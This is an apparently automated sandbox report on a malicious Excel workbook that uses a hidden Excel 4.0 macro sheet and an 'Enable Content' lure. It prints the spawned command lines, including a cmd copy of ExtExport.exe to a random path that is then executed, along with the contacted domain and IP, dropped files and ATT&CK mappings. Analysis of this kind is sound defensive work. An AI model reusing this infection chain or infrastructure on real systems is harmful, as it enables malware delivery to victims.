Loading ...

Play interactive tourEdit tour

Analysis Report document-47-2637.xls

Overview

General Information

Sample Name:document-47-2637.xls
Analysis ID:432941
MD5:92dcc47a1a044fc3a2328ec6eef3918b
SHA1:6f9266a6c0b702cbaa0a3583df5c8cd1357eae35
SHA256:ac4b99079b1ceb11db593097e421de9d9092765feedc23a3ab8ef912b292c988
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1204 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2536 cmdline: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • nnAzot.exe (PID: 2380 cmdline: 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7 MD5: 7F7F391491C315A4A72EFCAC0D34FA93)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1204, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe, ProcessId: 2536

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: document-47-2637.xlsVirustotal: Detection: 26%Perma Link
Source: document-47-2637.xlsMetadefender: Detection: 22%Perma Link
Source: document-47-2637.xlsReversingLabs: Detection: 15%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.3.dr
Source: Binary string: extexport.pdb"Oh source: nnAzot.exe, 00000005.00000000.2097222349.00000000003A1000.00000020.00020000.sdmp, nnAzot.exe.3.dr

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
Source: global trafficDNS query: name: webhub365.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.244.146.96:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.244.146.96:443
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: unknownDNS traffic detected: queries for: webhub365.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownHTTPS traffic detected: 198.244.146.96:443 -> 192.168.2.22:49167 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing" and then click "Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35
Source: Screenshot number: 4Screenshot OCR: Enable Content". 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 .I lj 38 , Id q p
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: document-47-2637.xlsInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: document-47-2637.xlsInitial sample: Sheet size: 14533
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: Joe Sandbox ViewDropped File: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 022577F47FB074B7D942C8F01DAAC778B110A373DE03B3B5043E887995B09D52
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/14@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\C7DE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD0C6.tmpJump to behavior
Source: document-47-2637.xlsOLE indicator, Workbook stream: true
Source: C:\Windows\System32\cmd.exeConsole Write: ..................nJ............ . . . . . . . .1. .f.i.l.e.(.s.). .c.o.p.i.e.d..........W.v............P.......(.......6.........nJ.........^..Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: document-47-2637.xlsVirustotal: Detection: 26%
Source: document-47-2637.xlsMetadefender: Detection: 22%
Source: document-47-2637.xlsReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c copy '%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe' C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe 'C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe' C:\aZ8ThU0Y\ERdZMUem GdPT AuMr7Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: extexport.pdb source: nnAzot.exe, nnAzot.exe.3.dr
Source: Binary string: extexport.pdb"Oh source: nnAzot.exe, 00000005.00000000.2097222349.00000000003A1000.00000020.00020000.sdmp, nnAzot.exe.3.dr
Source: document-47-2637.xlsInitial sample: OLE indicators vbamacros = False
Source: document-47-2637.xlsInitial sample: OLE indicators encrypted = True
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A4F09 push ecx; ret 5_2_003A4F1C
Source: C:\Windows\System32\cmd.exeFile created: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeJump to dropped file
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A230E LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_003A230E
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: document-47-2637.xlsStream path 'Workbook' entropy: 7.97723236264 (max. 8.0)
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A4BBA SetUnhandledExceptionFilter,5_2_003A4BBA
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A4F4C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_003A4F4C
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A4DF8 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_003A4DF8
Source: C:\aZ8ThU0Y\ERdZMUem\nnAzot.exeCode function: 5_2_003A47E2 GetVersionExA,5_2_003A47E2

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1Application Shimming1Process Injection1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting2Boot or Logon Initialization ScriptsApplication Shimming1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution23Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery4SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
document-47-2637.xls26%VirustotalBrowse
document-47-2637.xls23%MetadefenderBrowse
document-47-2637.xls15%ReversingLabsDocument-Office.Trojan.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe0%VirustotalBrowse
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe2%MetadefenderBrowse
C:\aZ8ThU0Y\ERdZMUem\nnAzot.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
webhub365.com0%VirustotalBrowse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
webhub365.com
198.244.146.96
truefalseunknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
198.244.146.96
webhub365.comUnited States
18630RIDLEYSD-NETUSfalse

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:432941
Start date:11.06.2021
Start time:00:00:08
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 43s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:document-47-2637.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal76.expl.evad.winXLS@5/14@1/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 100% (good quality ratio 88.6%)
  • Quality average: 72.3%
  • Quality standard deviation: 34.5%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 67.26.17.254, 8.238.28.126, 8.238.36.254, 8.238.85.126, 8.241.78.126
  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtDeviceIoControlFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
198.244.146.96document-47-2637.xlsGet hashmaliciousBrowse
    document-47-2637.xlsGet hashmaliciousBrowse

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      webhub365.comdocument-47-2637.xlsGet hashmaliciousBrowse
      • 198.244.146.96

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      RIDLEYSD-NETUSdocument-47-2637.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      document-47-2637.xlsGet hashmaliciousBrowse
      • 198.244.146.96

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      7dcce5b76c8b17472d024758970a406bdocument-47-2637.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      ManyToOneMailMerge Ver 18.2.dotmGet hashmaliciousBrowse
      • 198.244.146.96
      WV Northern Community College.docxGet hashmaliciousBrowse
      • 198.244.146.96
      Tax Folder.docGet hashmaliciousBrowse
      • 198.244.146.96
      51564.docxGet hashmaliciousBrowse
      • 198.244.146.96
      f.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      P.I-84514.docGet hashmaliciousBrowse
      • 198.244.146.96
      P.I-84512.docGet hashmaliciousBrowse
      • 198.244.146.96
      swift_euro.docxGet hashmaliciousBrowse
      • 198.244.146.96
      xTnb7uPpSb.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      Y8bVoElk4Y.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      xTnb7uPpSb.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      statistic-608048546.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      212161C3EFE82736FA483FC9E168CE71#U007eC2#U007e1B6B2C73#U007e00#U007e1.xlsxGet hashmaliciousBrowse
      • 198.244.146.96
      cryptowall.exeGet hashmaliciousBrowse
      • 198.244.146.96
      invoice-H9247.docxGet hashmaliciousBrowse
      • 198.244.146.96
      T3ZhUk5pyO.xlsGet hashmaliciousBrowse
      • 198.244.146.96
      Invoice.xlsmGet hashmaliciousBrowse
      • 198.244.146.96
      Prudential Investment Services.docGet hashmaliciousBrowse
      • 198.244.146.96
      Donation Receipt 36561536.docGet hashmaliciousBrowse
      • 198.244.146.96

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\aZ8ThU0Y\ERdZMUem\nnAzot.exedocument-47-2637.xlsGet hashmaliciousBrowse
        document-37-1849.xlsGet hashmaliciousBrowse

          Created / dropped Files

          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:Microsoft Cabinet archive data, 60080 bytes, 1 file
          Category:dropped
          Size (bytes):60080
          Entropy (8bit):7.995256720209506
          Encrypted:true
          SSDEEP:768:O78wIEbt8Rc7GHyP7zpxeiB9jTs6cX8ENclXVbFYYDceSKZyhRhbzfgtEnz9BPNZ:A8Rc7GHyhUHsVNPOlhbz2E5BPNiUu+g4
          MD5:6045BACCF49E1EBA0E674945311A06E6
          SHA1:379C6234849EECEDE26FAD192C2EE59E0F0221CB
          SHA-256:65830A65CB913BEE83258E4AC3E140FAF131E7EB084D39F7020C7ACC825B0A58
          SHA-512:DA32AF6A730884E73956E4EB6BFF61A1326B3EF8BA0A213B5B4AAD6DE4FBD471B3550B6AC2110F1D0B2091E33C70D44E498F897376F8E1998B1D2AFAC789ABEB
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview: MSCF............,...................I........d.........R9b .authroot.stl.3..).4..CK..8T....c_.d....A.K...].M$[v.4.)7-.%.QIR..$t)Kd.-[..T\{..ne.....{..<.......Ab.<..X....sb.....e........dbu.3...0........X..00&Z....C...p0.}..2..0m.}..Cj.9U..J.j.Y...#.L..\X..O.,...,.qu..]..(B.nE~Q...)..Gcx.....}...f....zw.a..9+[.<0.'..2 .s..ya..J......wd....OO!.s....`.WA...F6._f....6...g..2..7.$,....X.k..&...E...g.....>uv."..!......xc......C..?....P0$.Y..?u....Z0.g3.>W0&.y.(....].`>... ..R.q..wg*X......qB!.B....Z.4..>.R.M..0.8...=.8..Ya.s.......add..)..w.4.&.z...2.&74.5]..w.j.._iK..||[.w.M.!<-.}%.C<tDX5\s._..I..*..nb.....GCQ.V..r..Y.............q...0..V)Tu>.Z..r...I...<.R{Ac..x^. .<A........|.{.....Q...&....X..C$....e9.:..vI..x.R4...L......%g...<..}'{....E8Sl...E".h...*.........ItVs.K......3.9.l..`D..e.i`....y...,..5....aSs`..W...d...t.J..]....'u3..d]7..=e....[R!:........Q.%..@........ga.v.~..q....{.!N.b]x..Zx.../;#}.f.)k.c9..{rmPt..z5.m=..q..%.D#<+Ex....1|.._F.
          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):893
          Entropy (8bit):7.366016576663508
          Encrypted:false
          SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
          MD5:D4AE187B4574036C2D76B6DF8A8C1A30
          SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
          SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
          SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
          Malicious:false
          Reputation:high, very likely benign file
          Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):328
          Entropy (8bit):3.1225789902305854
          Encrypted:false
          SSDEEP:6:kKLgNie8N+SkQlPlEGYRMY9z+4KlDA3RUeWlK1MMx:D78kPlE99SNxAhUe3OMx
          MD5:9332649BE2B7EEB84D2A51B4FCB8C610
          SHA1:EC5B37F58C8810F61A0978167001D6CAEE4CF14D
          SHA-256:B818B209B0885F643CECD70C1447B3D3C4547F7C7D2884195D19E2AFFC81A42D
          SHA-512:EB42861F3768F3B86281BBDB86702AA552E46F6CD4B38C215545ADFF820B905ED61B45B40C49B8B97EBF65462F796DA4EE5707F3B241CD24F9033858DA8AA2BE
          Malicious:false
          Reputation:low
          Preview: p...... ..........r~.^..(....................................................... ............L......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.0.e.6.c.f.e.3.4.c.d.7.1.:.0."...
          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
          File Type:data
          Category:dropped
          Size (bytes):252
          Entropy (8bit):3.0169823334697616
          Encrypted:false
          SSDEEP:3:kkFkluAVfllXlE/JADkdllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1yWJ/fdl/:kKWYADk5liBAIdQZV7QWB
          MD5:5604964BDBEBD78FC30DCCFE0D288FBC
          SHA1:CFB823EC2DC190DB7B1B6273EA727DBE29968A9D
          SHA-256:B7C960629B8D092922FC3F8FAEEC71203CA8F0576026D3167745439AA3108D72
          SHA-512:1499517A5F36BBFE8FE8D4460FCD94564DD6DD53610207A9B715F81BDC504CE306E65246668BABAEC6C3694D300CFBBB4DFAEE48E21E43EE8194083EE2A0F5E8
          Malicious:false
          Reputation:low
          Preview: p...... ....`... G0~.^..(....................................................... .........e..S......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.c.3.6.7.2.e.8.3.f.1.4.0."...
